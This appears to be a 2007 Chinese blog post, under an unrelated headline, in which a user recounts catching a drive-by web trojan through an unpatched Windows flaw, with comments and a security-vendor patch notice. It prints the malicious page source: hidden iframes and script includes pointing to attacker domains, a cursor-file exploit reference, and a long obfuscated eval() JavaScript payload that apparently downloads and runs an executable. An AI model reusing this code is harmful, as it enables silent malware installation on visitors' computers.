中国男子在日“袭击”李登辉被捕 何时获释未定[转]
域名事件
2007/06/20 13:38 | 微软的漏洞不知道哪来那么多,今天又来,不知道打开哪个网站,而那个网站被挂了网页木马,搞得现在一打开浏览器就弹出病毒提示,进到安全模式杀毒又没有,仔细查查,挂马网站是:http://1111.845845.cn/xi.htm(未打微软最新补丁的人千万不要访问),查看到几个网页源代码:
<iframe src=http://1111.845845.cn/xi.htm width=0 height=0></iframe> <HTML>
<BODY style='CURSOR: url(http://www.if56.cn/ad.jpg)'></BODY>
</HTML>
<script src=http://1234.89111.cn/0002.js></script>
<iframe src="http://www.if56.cn/lo/2.htm" width="0" height="0" border="0"></iframe>
<script language="javascript" src="http://ww3.tongji123.com/t1.aspx?id=37219617"></script>
<iframe src=http://1111.845845.cn/xi.htm width=0 height=0></iframe> <html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>test</title>
<script src="haha.js"></script>
</head>
<body onload="shit();">
test
</body>
一个一个访问,发现了一个流量统计的网站:http://ww3.tongji123.com/t1.aspx?id=37219617,呵呵,这鸟人还关心有多少人中了他的毒,再看到一段JS脚本:
haha.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1s("\\k\\6\\3\\8\\H\\5\\5\\b\\O\\4\\1\\3\\k\\1\\3\\8\\r\\8\\9\\t\\7\\7\\c\\15\\12\\R\\t\\9\\h\\2\\d\\5\\9\\8\\4\\j\\d\\2\\f\\e\\15\\12\\S\\15\\12\\11\\2\\3\\Q\\S\\H\\5\\5\\b\\O\\4\\1\\3\\k\\1\\3\\8\\r\\8\\9\\1\\n\\8\\E\\h\\2\\d\\k\\1\\U\\J\\D\\14\\1\\h\\2\\f\\i\\0\\g\\s\\C\\0\\g\\v\\1a\\0\\g\\G\\s\\0\\g\\v\\w\\0\\g\\v\\C\\0\\g\\v\\s\\0\\g\\G\\K\\0\\g\\s\\V\\0\\g\\v\\s\\0\\g\\G\\K\\0\\g\\G\\v\\0\\g\\v\\s\\0\\g\\G\\K\\0\\g\\K\\w\\0\\g\\G\\G\\0\\g\\v\\s\\0\\g\\v\\K\\0\\g\\s\\C\\0\\g\\v\\1a\\0\\g\\G\\s\\0\\g\\v\\w\\0\\g\\v\\C\\0\\g\\v\\s\\0\\g\\G\\K\\0\\g\\K\\w\\0\\g\\V\\N\\i\\e\\c\\M\\15\\12\\11\\h\\6\\2\\h\\j\\f\\1\\e\\S\\3\\1\\2\\t\\3\\9\\c\\M\\15\\12\\11\\k\\6\\3\\8\\h\\o\\b\\c\\15\\12\\11\\h\\o\\b\\r\\i\\F\\4\\h\\3\\d\\m\\2\\8\\b\\1\\R\\1\\3\\I\\8\\k\\6\\3\\8\\4\\j\\1\\7\\7\\r\\0\\i\\F\\j\\2\\o\\7\\I\\F\\D\\5\\b\\Q\\I\\F\\4\\h\\3\\d\\m\\2\\I\\n\\d\\9\\b\\5\\n\\a\\o\\5\\k\\1\\16\\5\\f\\C\\l\\l\\l\\u\\C\\l\\l\\l\\e\\c\\n\\d\\9\\b\\5\\n\\a\\3\\1\\4\\d\\17\\1\\16\\5\\f\\l\\u\\l\\e\\c\\k\\6\\3\\8\\4\\j\\1\\7\\7\\r\\9\\1\\n\\8\\E\\h\\2\\d\\k\\1\\U\\J\\D\\14\\1\\h\\2\\f\\0\\0\\0\\i\\n\\4\\h\\3\\d\\m\\2\\a\\4\\j\\1\\7\\7\\0\\0\\0\\i\\e\\c\\4\\j\\1\\7\\7\\a\\13\\t\\9\\f\\0\\0\\0\\i\\T\\10\\0\\0\\0\\0\\0\\0\\0\\0\\y\\3\\5\\P\\3\\6\\19\\N\\0\\0\\0\\0\\0\\0\\0\\0\\L\\9\\2\\1\\3\\9\\19\\N\\0\\0\\0\\0\\0\\0\\0\\0\\L\\w\\U\\y\\18\\J\\13\\w\\a\\w\\U\\w\\8\\j\\2\\2\\m\\10\\z\\z\\n\\n\\n\\a\\d\\R\\s\\v\\a\\h\\9\\z\\7\\5\\z\\b\\5\\n\\9\\o\\o\\a\\j\\2\\o\\7\\0\\0\\0\\i\\u\\l\\u\\l\\e\\c\\R\\t\\9\\h\\2\\d\\5\\9\\8\\3\\t\\9\\o\\o\\f\\e\\S\\k\\6\\3\\8\\m\\6\\2\\j\\r\\4\\j\\1\\7\\7\\a\\q\\m\\1\\h\\d\\6\\7\\B\\5\\7\\b\\1\\3\\4\\f\\0\\0\\0\\i\\1r\\Q\\W\\5\\h\\t\\o\\1\\9\\2\\4\\0\\0\\0\\i\\e\\c\\k\\6\\3\\8\\4\\6\\k\\1\\m\\6\\2\\j\\r\\m\\6\\2\\j\\a\\4\\t\\D\\4\\2\\3\\d\\9\\P\\f\\l\\u\\m\\6\\2\\j\\a\\7\\6\\4\\2\\L\\9\\b\\1\\g\\J\\R\\f\\0\\0\\0\\i\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\i\\e\\e\\c\\4\\6\\k\\1\\m\\6\\2\\j\\X\\r\\0\\0\\0\\i\\0\\0\\0\\0\\0\\0\\0\\0\\18\\5\\h\\6\\7\\8\\q\\1\\2\\2\\d\\9\\P\\4\\0\\0\\0\\0\\0\\0\\0\\0\\16\\1\\o\\m\\5\\3\\6\\3\\Q\\8\\L\\9\\2\\1\\3\\9\\1\\2\\8\\B\\d\\7\\1\\4\\0\\0\\0\\0\\0\\0\\0\\0\\T\\5\\9\\2\\1\\9\\2\\a\\L\\w\\s\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\i\\c\\k\\6\\3\\8\\4\\m\\r\\9\\1\\n\\8\\E\\h\\2\\d\\k\\1\\U\\J\\D\\14\\1\\h\\2\\f\\0\\0\\0\\i\\4\\j\\1\\7\\7\\a\\6\\m\\m\\7\\d\\h\\6\\2\\d\\5\\9\\0\\0\\0\\i\\e\\c\\k\\6\\3\\8\\B\\5\\7\\b\\1\\3\\4\\r\\4\\m\\a\\p\\6\\o\\1\\q\\m\\6\\h\\1\\f\\4\\6\\k\\1\\m\\6\\2\\j\\e\\c\\R\\5\\3\\f\\d\\r\\l\\c\\d\\F\\B\\5\\7\\b\\1\\3\\4\\a\\L\\2\\1\\o\\4\\f\\e\\a\\T\\5\\t\\9\\2\\c\\d\\X\\X\\e\\S\\k\\6\\3\\8\\B\\5\\7\\b\\1\\3\\r\\B\\5\\7\\b\\1\\3\\4\\a\\L\\2\\1\\o\\4\\f\\e\\a\\L\\2\\1\\o\\f\\d\\e\\a\\y\\6\\2\\j\\c\\B\\5\\7\\b\\1\\3\\X\\r\\0\\0\\0\\i\\0\\0\\0\\0\\0\\0\\0\\0\\6\\D\\h\\1q\\N\\1p\\a\\1\\g\\1\\0\\0\\0\\i\\c\\2\\3\\Q\\S\\4\\j\\1\\7\\7\\a\\w\\g\\1\\h\\f\\B\\5\\7\\b\\1\\3\\e\\c\\M\\h\\6\\2\\h\\j\\f\\1\\e\\S\\M\\c\\M\\n\\d\\9\\b\\5\\n\\a\\h\\7\\5\\4\\1\\f\\e\\c\\M\\c\\4\\j\\1\\7\\7\\a\\13\\t\\9\\f\\0\\0\\0\\i\\h\\o\\b\\a\\1\\g\\1\\8\\z\\h\\8\\2\\3\\1\\1\\8\\h\\10\\0\\0\\0\\0\\0\\0\\0\\0\\8\\z\\R\\0\\0\\0\\i\\u\\l\\u\\N\\e\\c\\3\\t\\9\\o\\o\\f\\e\\c\\F\\0\\0\\z\\4\\h\\3\\d\\m\\2\\I\\F\\z\\D\\5\\b\\Q\\I\\F\\z\\j\\2\\o\\7\\I\\0\\i\\c\\k\\6\\3\\8\\q\\x\\p\\p\\A\\8\\r\\8\\9\\1\\n\\8\\E\\h\\2\\d\\k\\1\\U\\J\\D\\14\\1\\h\\2\\f\\0\\i\\E\\W\\J\\W\\Z\\a\\13\\1\\h\\5\\3\\b\\4\\1\\2\\0\\i\\e\\c\\q\\x\\p\\p\\A\\a\\B\\d\\1\\7\\b\\4\\a\\E\\m\\m\\1\\9\\b\\f\\0\\i\\q\\x\\p\\p\\A\\0\\i\\u\\8\\K\\l\\l\\u\\8\\V\\l\\l\\l\\e\\c\\q\\x\\p\\p\\A\\a\\J\\m\\1\\9\\f\\e\\c\\q\\x\\p\\p\\A\\a\\E\\b\\b\\p\\1\\n\\f\\e\\c\\q\\x\\p\\p\\A\\a\\B\\d\\1\\7\\b\\4\\f\\0\\i\\q\\x\\p\\p\\A\\0\\i\\e\\a\\1o\\6\\7\\t\\1\\r\\4\\j\\1\\7\\7\\c\\q\\x\\p\\p\\A\\a\\x\\m\\b\\6\\2\\1\\f\\e\\c\\q\\x\\p\\p\\A\\a\\q\\6\\k\\1\\f\\0\\i\\T\\10\\0\\0\\0\\0\\W\\5\\h\\t\\o\\1\\9\\2\\4\\8\\6\\9\\b\\8\\q\\1\\2\\2\\d\\9\\P\\4\\0\\0\\0\\0\\E\\7\\7\\8\\x\\4\\1\\3\\4\\0\\0\\0\\0\\1n\\1m\\1l\\1k\\1j\\1i\\0\\0\\0\\0\\1h\\1g\\0\\0\\0\\0\\1f\\1e\\0\\0\\0\\0\\Y\\d\\9\\b\\5\\n\\4\\a\\j\\2\\6\\0\\i\\u\\l\\e\\c\\q\\x\\p\\p\\A\\a\\T\\7\\5\\4\\1\\f\\e\\c\\F\\z\\4\\h\\3\\d\\m\\2\\I\\i\\c\\15\\12\\11\\k\\6\\3\\8\\3\\1\\2\\r\\H\\5\\5\\b\\O\\4\\1\\3\\k\\1\\3\\a\\E\\b\\b\\T\\6\\2\\1\\5\\P\\3\\Q\\f\\h\\o\\b\\e\\c\\15\\12\\11\\H\\5\\5\\b\\O\\4\\1\\3\\k\\1\\3\\a\\q\\1\\2\\Z\\3\\5\\n\\4\\1\\3\\Y\\d\\9\\b\\5\\n\\q\\d\\17\\1\\f\\l\\u\\l\\u\\C\\l\\l\\u\\V\\l\\l\\e\\c\\15\\12\\11\\k\\6\\3\\8\\4\\2\\3\\y\\6\\2\\j\\8\\r\\8\\H\\5\\5\\b\\O\\4\\1\\3\\k\\1\\3\\a\\H\\1\\2\\q\\1\\3\\k\\1\\3\\y\\6\\2\\j\\f\\e\\c\\15\\12\\11\\4\\2\\3\\y\\6\\2\\j\\8\\r\\8\\4\\2\\3\\y\\6\\2\\j\\a\\4\\t\\D\\4\\2\\3\\f\\l\\u\\8\\4\\2\\3\\y\\6\\2\\j\\a\\7\\1\\9\\P\\2\\j\\1d\\N\\e\\c\\15\\12\\11\\4\\2\\3\\y\\6\\2\\j\\X\\r\\i\\0\\0\\m\\6\\P\\1\\0\\0\\d\\9\\b\\1\\g\\a\\j\\2\\o\\i\\c\\15\\12\\11\\H\\5\\5\\b\\O\\4\\1\\3\\k\\1\\3\\a\\q\\1\\2\\Z\\3\\5\\n\\4\\1\\3\\Y\\d\\9\\b\\5\\n\\W\\6\\2\\6\\f\\4\\2\\3\\y\\6\\2\\j\\u\\i\\0\\g\\s\\V\\0\\g\\s\\s\\0\\g\\C\\w\\0\\g\\C\\w\\0\\g\\s\\1c\\i\\e\\c\\15\\12\\11\\H\\5\\5\\b\\O\\4\\1\\3\\k\\1\\3\\a\\1b\\d\\b\\1\\Z\\3\\5\\n\\4\\1\\3\\Y\\d\\9\\b\\5\\n\\f\\N\\e\\c\\15\\12\\11\\3\\1\\2\\t\\3\\9\\c\\15\\12\\M")',62,91,'134|145|164|162|163|157|141|154|40|156|56|144|73|151|51|50|170|143|42|150|166|60|160|167|155|116|123|75|65|165|54|66|105|125|120|57|131|106|64|142|101|74|67|107|76|117|62|111|175|61|137|147|171|146|173|103|130|63|104|53|127|102|72|||122|152||124|172|114|176|70|110|71|55|u52A8|u542F|u5E8F|u7A0B|u5355|u83DC|u300D|u59CB|u5F00|u300C|126|135|133|115|eval'.split('|'),0,{}))
看着还是没有办法清除,就在网上搜索相关资料,找到360安全卫士,发现这个漏洞在前几天就发布出来了,只不过我没去关于而已,心想,难怪前天有补丁提示我下载,但是我没下载成功。今天就中招了,看到安全卫士有提供补丁下载,可是,我的是WIN2003,用不了,打开微软的下载页面,却打不开,看到网上除了打补丁之外,也没有其它方法,我只能在路由器里面过滤掉这个挂马网站的所有域名,重启路由器,再试,呵呵,发现不再弹出那鬼病毒网站了,赶快去微软下载补丁,不知道安装了之后还会不会出问题。
兄弟,现在网上也没有解决的方法
我也是2003的系统,下载IE都上不了网,只能是用FIREFOX,但是感觉很多东西都不能看 !
微软再曝高危漏洞 木马病毒可随意种植,360安全卫士及时跟进提供补丁下载
微软再曝高危漏洞 木马病毒可随意种植
近日,微软一并发布多个系统漏洞补丁。据了解,其中部分漏洞的危害性不亚于前一段时期闹得沸沸扬扬的“微软ANI鼠标指针”漏洞。而“ANI鼠标指针”漏洞是微软历史上危害最大,影响面最广的高危漏洞之一。随后不久,360安全卫士也发布了更新版本。
据360安全专家介绍,此次发布的漏洞补丁,其中一个为系统API级的漏洞,与“ANI鼠标指针”漏洞同属一个危险级别。无论用户使用的是IE6、IE7,还是Firefox、Opera等浏览器,只要攻击者在网页中加一段js脚本,调用这个漏洞,即可在你访问该网页的时候,随意在你机器上种植各种木马和后门程序。其危害性之大可见一斑。
360安全中心提醒广大用户及时更新360安全卫士版本,检查自己电脑是否已经感染木马病毒,并使用360安全卫士修复系统漏洞功能升级微软漏洞补丁,及时修补漏洞。远离木马、后门等恶意程序的危害。
大家将360安全卫士特征库升至最新并使用修复系统漏洞功能扫描并安装补丁即可。
(注:360安全卫士所更新的补丁不包含微软正版验证补丁,如需要安装该补丁,请访问微软官方补丁下载地址进行安装。)
如果安装失败 说明系统是被非法改了注册表
请按这个朋友的blog的方法做一下 http://hi.baidu.com/06032424/blog/item/abf37ac62315051a9c163d7c.html